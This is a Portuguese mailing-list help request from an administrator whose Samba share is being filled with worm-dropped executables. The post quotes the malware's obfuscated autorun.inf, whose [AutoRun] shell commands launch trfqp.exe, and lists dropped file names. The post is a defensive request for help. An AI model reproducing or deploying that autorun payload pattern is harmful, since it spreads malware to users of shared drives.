[Ubuntu-BR] Vírus gravando em compartilhamento Samba

[Leonardo Leão]

Pessoal instalei uma VM com Ubuntu 12.04 e criei um compartilhamento no
SAMBA para armazenar um Banco de Dados, porém algum vírus está gravando
muitos arquivos na raiz desse compartilhamento e fazendo o programa que
acessa esse banco de dados travar na empresa inteira. Arquivos com
extensões tipo: .EXE, .CMD, .PIF, .INF

Para resolver o problema por hora, bloqueei arquivos com as extensões acima
citadas e dei permissão de somente leitura na raiz do compartilhamento.
Porém as extensões também foram bloqueadas nos subdiretórios.

CÓDIGO DO AUTORUN.INF que estava na raiz do compartilhamento.




















*;jsgCpxpOfgGmlmCnaoStsULqKpp
lhHtbhlrVXbYaiJ[AutoRun];KpKeounwgroAwOPDDSEaornx
iNuxgnlji;cjoJAlYeDgShELl\opeN\cOmmANd=trfqp.exe;GxnlsLiMwDaOaPLUyWCXsuroPeN
=trfqp.exe;UmbhbVvhmNdqLnwjpuSWy tSsdUWuNceshell\eXplORe\CommanD
=trfqp.exe;NRPrN nddNASghW okVtAshEll\OPEN\deFault=1;RNvUxxeXSoyKWLV
QoFpshell\AUToplay\cOMmand= trfqp.exe;qXvaHe*
ALGUNS DOS ARQUIVOS QUE ESTAVAM SENDO CRIADOS.
comtmo.cmd   fjiuph.exe  idvx.exe    kwynyl.cmd  nrxbd.pif   qktbg.pif
tfgpea.cmd  wbfps.exe   ytvcl.cmd
comx.exe     fjjgx.pif   idwd.pif    kwyp.exe    nrxg.exe    qktf.cmd
tfgq.pif    wbftq.pif   ytvdc.exe
conwro.cmd   fjjji.pif   idwj.pif    kwyp.pif    nrxhcb.cmd  qktglm.pif
tfhd.pif    wbgh.exe    ytvrk.exe


Gostaria de saber como bloqueio as extensões apenas na raiz do
compartilhamento, ou se existe uma maneira melhor de proteger esse
compartilhamento.